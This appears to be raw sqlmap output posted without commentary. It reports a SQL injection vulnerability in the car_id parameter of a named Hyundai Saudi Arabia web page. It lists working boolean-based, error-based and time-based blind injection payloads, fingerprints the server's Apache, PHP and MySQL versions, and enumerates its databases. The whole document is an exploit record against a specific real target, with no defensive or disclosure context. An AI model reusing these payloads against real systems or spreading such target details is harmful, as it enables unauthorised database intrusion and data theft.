http://www.hyundai-saudiarabia.com/en/index.php?car_id=26 (GET)
Parameter: car_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: car_id=26' AND 6412=6412 AND 'lUli'='lUli Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: car_id=26' AND (SELECT 7413 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (CASE WHEN (7413=7413) THEN 1 ELSE 0 END)),0x7178626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fbEe'='fbEe Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: car_id=26' AND SLEEP(5) AND 'YJZb'='YJZb --- web application technology: Apache 2.2.29, PHP 5.4.35 back-end DBMS: MySQL 5.0 available databases [2]: [*] information_schema [*] naghihyundainew